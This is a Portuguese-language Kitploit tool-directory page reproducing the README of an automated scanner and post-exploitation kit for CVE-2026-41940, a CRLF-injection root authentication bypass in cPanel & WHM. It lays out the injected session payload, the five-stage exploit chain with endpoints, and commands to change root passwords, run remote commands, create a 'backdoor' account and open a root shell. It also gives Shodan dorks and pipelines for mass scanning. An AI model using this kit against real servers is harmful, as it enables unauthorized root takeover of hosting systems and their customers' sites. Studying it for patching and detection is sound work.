Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Automated-scanner-CVE-2026-41940 — Scanner automatizado e kit de pós-exploração para CVE-2026-41940 — bypass de autenticação root do cPanel & WHM via injeção CRLF em arquivo de sessão | Kitploit
Ferramentas/GitHubGitHub/sardine-web/automated-scanner-cve-2026-41940
Autenticação e AutorizaçãoReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Red Teaming
Desenvolvimento de Payloads
GitHubsardine-web/automated-scanner-cve-2026-41940

Automated-scanner-CVE-2026-41940

Scanner automatizado e kit de pós-exploração para CVE-2026-41940 — bypass de autenticação root do cPanel & WHM via injeção CRLF em arquivo de sessão

Ver Repositório
16há 3 mesesAinda não revisado
Compartilhar

CPANEL CVE EXPLOIT

English | فارسی (Persian)

root@kitploit:~
 ██████╗██████╗  █████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔══██╗██╔══██╗████╗  ██║██╔════╝██║
██║     ██████╔╝███████║██╔██╗ ██║█████╗  ██║
██║     ██╔═══╝ ██╔══██║██║╚██╗██║██╔══╝  ██║
╚██████╗██║     ██║  ██║██║ ╚████║███████╗███████╗
 ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚══════╝

 ██████╗██╗   ██╗███████╗
██╔════╝██║   ██║██╔════╝
██║     ██║   ██║█████╗
██║     ╚██╗ ██╔╝██╔══╝
╚██████╗ ╚████╔╝ ███████╗
 ╚═════╝  ╚═══╝  ╚══════╝

███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝

Python CVE CVSS License Stdlib

Scanner automatizado e kit de pós-exploração para CVE-2026-41940 — bypass de autenticação root do cPanel & WHM via injeção de CRLF no arquivo de sessão.


Índice

  • Visão Geral
  • Detalhes do CVE
  • Como Funciona
  • Recursos
  • Versões Afetadas
  • Requisitos
  • Instalação
  • Início Rápido
  • Uso
  • Ações de Pós-Exploração
  • Shell WHM Interativo
  • Varredura em Massa e Integração com Pipeline
  • Dorks do Shodan
  • Formato de Saída
  • Exemplo de Sessão
  • Aviso Legal

Visão Geral

CPANEL CVE EXPLOIT é uma ferramenta Python de arquivo único projetada para avaliações de segurança autorizadas de servidores cPanel & WHM vulneráveis ao CVE-2026-41940.

A vulnerabilidade permite que um atacante remoto não autenticado envenene arquivos de sessão do WHM por meio de injeção de CRLF no cabeçalho Authorization: Basic, contornando a autenticação e obtendo acesso WHM em nível de root sem credenciais válidas.


Detalhes do CVE

Causa Raiz

Em versões vulneráveis do cPanel & WHM, saveSession() em Session.pm chama filter_sessiondata() após gravar o arquivo de sessão em disco. Um atacante pode injetar caracteres CRLF (\r\n) por meio do cabeçalho HTTP Authorization: Basic, que são gravados diretamente no arquivo de sessão em disco — contornando a sanitização.

Campos de Sessão Injetados

A ferramenta usa um payload codificado em Base64 que é decodificado para:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Esses campos simulam uma sessão WHM root totalmente autenticada, incluindo bypass de 2FA (tfa_verified=1) e o sinalizador de privilégio root (hasroot=1).

Correção

A cPanel moveu filter_sessiondata() para ser executado antes da operação de gravação da sessão em Session.pm.


Como Funciona

A cadeia de exploração consiste em 5 estágios (Estágio 0–4):

root@kitploit:~
flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]

    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]

Recursos


Versões Afetadas

Nota: Alvos que executam builds corrigidos são automaticamente sinalizados e ignorados durante a varredura.


Requisitos

Núcleo (obrigatório)

  • Python 3.8+
  • Nenhum pacote externo — usa apenas a biblioteca padrão do Python

Opcional

PacotePropósito
seleniumLogin automático no navegador (--selenium)
Chrome / FirefoxMotor de navegador para Selenium
root@kitploit:~
pip install -r requirements.txt   # optional — selenium only

Instalação

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit

Nenhuma etapa de build necessária. Execute diretamente:

root@kitploit:~
python3 test-cve.py --help

Início Rápido

root@kitploit:~
# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087

# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list

# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json

Uso

root@kitploit:~
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                   [-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD]
                   [--new-user NEW_USER] [--new-domain NEW_DOMAIN]
                   [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]

Opções de Alvo

FlagDescrição
-u, --url

Opções de Varredura

Opções de Saída

FlagDescrição
-o, --outputSalvar descobertas em arquivo JSON
--no-colorDesativar saída colorida ANSI

Ações de Pós-Exploração

As flags de pós-exploração funcionam apenas em alvos únicos (-u, não em varredura em massa).

Exemplos

root@kitploit:~
# Change root password after bypass
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# Execute remote command
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# Create backdoor cPanel account
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# Open interactive WHM shell
python3 test-cve.py -u https://target.com:2087 --action shell

# Auto-login via Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# Manual browser login (prints JS for DevTools console)
python3 test-cve.py -u https://target.com:2087 --browser

Shell WHM Interativo

Inicie com --action shell para uma sessão interativa completa:

root@kitploit:~
[email protected] ▶ help

  id / whoami / hostname / version  → server info
  ls [path]                         → file listing
  cat [path]                        → read file contents
  accounts                          → list cPanel accounts
  addadmin <user> <pass>            → create WHM admin/reseller
  passwd <newpass>                  → change root password
  exec <command>                    → run OS command
  exit / quit                       → exit shell

Exemplo:

root@kitploit:~
[email protected] ▶ id
  uid=0(root) gid=0(root) groups=0(root)

[email protected] ▶ accounts
  user=webuser1          domain=example.com          [email protected]
  user=webuser2          domain=test.com             [email protected]

[email protected] ▶ cat /etc/passwd

[email protected] ▶ exit

Varredura em Massa e Integração com Pipeline

A partir de arquivo

root@kitploit:~
python3 test-cve.py -l targets.txt -t 20 -o results.json

A partir do stdin (pipe)

root@kitploit:~
cat urls.txt | python3 test-cve.py

# subfinder + httpx pipeline
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Shodan pipeline
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json

Formatos de entrada suportados

FormatoExemplo
URL completahttps://192.168.1.1:2087
IP + porta192.168.1.1 2087
Saída do ShodanAnalisada automaticamente via regex
Saída colorida ANSIRemovida automaticamente

Dorks do Shodan

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087

Formato de Saída

As descobertas são salvas como JSON ao usar -o results.json:

root@kitploit:~
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}

Resumo no console

root@kitploit:~
══════════════════════════════════════════════════════════════════════
  cPanelSniper — CVE-2026-41940 Scan Complete
  Time: 12.4s  ·  Targets: 50
──────────────────────────────────────────────────────────────────────

  ⚡ 2 VULNERABLE TARGET(S)

  Target   : https://victim1.com:2087
  Version  : 11.126.0.50
  Token    : /cpsess1234567890
  API URL  : https://victim1.com:2087/cpsess1234567890/json-api/version
  Evidence : {"version":"11.126.0.50"...}

══════════════════════════════════════════════════════════════════════

Exemplo de Sessão

root@kitploit:~
$ python3 test-cve.py -u https://target.com:2087

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : scan only

12:00:01 [INFO] Canonical hostname discovered: server.target.com
12:00:02 [  OK] Stage1: preauth session = root:abc123...
12:00:03 [  OK] Stage2: HTTP 307 → token=/cpsess1234567890
12:00:04 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
12:00:05 [INFO] Stage4: HTTP 200  {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.126.0.50 — CONFIRMED vulnerable)
12:00:05 [PWND]   Token    : /cpsess1234567890
12:00:05 [PWND]   Session  : root:abc123...
12:00:05 [PWND]   Version  : 11.126.0.50
12:00:05 [PWND]   API URL  : https://target.com:2087/cpsess1234567890/json-api/version

Estrutura do Projeto

root@kitploit:~
cpanel-cve-exploit/
├── test-cve.py        # Main scanner & exploit tool (single file)
├── requirements.txt   # Optional: selenium
├── README.md          # English documentation
└── README.fa.md       # Persian documentation (فارسی)

Aviso Legal

SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é fornecida apenas para fins educacionais e de testes de penetração autorizados.

  • Use apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.
  • O acesso não autorizado a sistemas de computador é ilegal de acordo com leis como a CFAA (EUA), o Computer Misuse Act (Reino Unido) e legislação equivalente em todo o mundo.
  • A exploração ativa do CVE-2026-41940 foi confirmada — aplique o patch em sistemas afetados imediatamente.
  • Os autores e contribuidores não assumem nenhuma responsabilidade pelo uso indevido deste software.

Ao usar esta ferramenta, você concorda em usá-la de forma responsável e em conformidade com todas as leis aplicáveis.


Referências

  • CVE-2026-41940 — Entrada no NVD
  • Aviso de Segurança da cPanel — patch de injeção de CRLF no Session.pm
  • Porta padrão do WHM: 2087 (HTTPS)

Construída para pesquisadores de segurança · Use com responsabilidade

Baixar ferramenta
PropriedadeValor
CVECVE-2026-41940
GravidadeCrítica
CVSS10.0
Vetor de AtaqueRede / Não autenticado
ImpactoAcesso root total ao WHM
Porta Padrão2087 (WHM)
StatusExploração ativa confirmada (abr 2026)
EstágioEndpointPropósito
0/openid_connect/cpanelidDescobrir automaticamente o hostname canônico via redirecionamento 307
1/login/?login_only=1Obter cookie whostmgrsession de pré-autenticação com credenciais incorretas
2/Injetar cabeçalho Authorization: Basic envenenado com CRLF no arquivo de sessão
3/scripts2/listacctsAcionar o gadget do_token_denied para despejar a sessão no cache
4/{token}/json-api/versionConfirmar acesso root — HTTP 200 com JSON de versão
RecursoDescrição
Varredura de alvo únicoCadeia de exploração completa contra uma URL WHM
Varredura em massaVarredura multithread a partir de arquivo ou stdin
Detecção de versãoComparação automática de versão corrigida/vulnerável
API de pós-exploraçãoAlteração de senha, execução de comandos, listagem de contas, criação de usuários
Shell interativoShell root WHM integrado com leitura de arquivos e comandos de API
Login via SeleniumInjeção automática do cookie de sessão no Chrome/Firefox
Fallback manual no navegadorTrechos de JavaScript para console para login manual no WHM
Verificação de RCEVerificação rápida de id / uname -a após o bypass
Exportação JSONSalvar todas as descobertas em relatório JSON estruturado
Pronto para pipelinesFunciona com pipelines de httpx, subfinder, shodan e awk
Apenas stdlibNenhuma dependência pip necessária para a funcionalidade principal
Saída coloridaRegistro de estágios em tempo real com indicadores de gravidade
BranchCorrigido emStatus
11.110.x11.110.0.97Vulnerável abaixo do patch
11.118.x11.118.0.63Vulnerável abaixo do patch
11.126.x11.126.0.54Vulnerável abaixo do patch
11.132.x11.132.0.29Vulnerável abaixo do patch
11.134.x11.134.0.20Vulnerável abaixo do patch
11.136.x11.136.0.5Vulnerável abaixo do patch
URL de alvo único (ex.: https://host:2087)
-l, --listArquivo contendo URLs, uma por linha
--hostnameSubstituir o cabeçalho Host canônico (descoberto automaticamente por padrão)
FlagPadrãoDescrição
-t, --threads10Número de threads de varredura simultâneas
--timeout15Timeout HTTP em segundos
--rate-limit0Atraso (segundos) entre envios de alvos
AçãoFlagDescrição
Somente varredura(padrão)Executar a cadeia de exploração e relatar a vulnerabilidade
Listar contas--action listListar todas as contas cPanel via API do WHM
Alterar senha--action passwd --passwd <pass>Alterar a senha root do WHM
Executar comando--action cmd --cmd "id;whoami"Executar comando do sistema via API exec do WHM
Informações do servidor--action infoColetar hostname, carga, disco e versão
Obter versão--action versionObter a versão do cPanel/WHM via API
Criar conta--action adduser --new-user u --new-domain d.com --passwd pCriar nova conta cPanel
Shell interativo--action shellIniciar shell root WHM interativo
Verificação de RCE--check-rceExecutar id;uname -a após bypass bem-sucedido
Login via Selenium--selenium [--engine chrome|firefox]Login automático no painel WHM no navegador
Navegador manual--browserExibir comandos de console JavaScript para login manual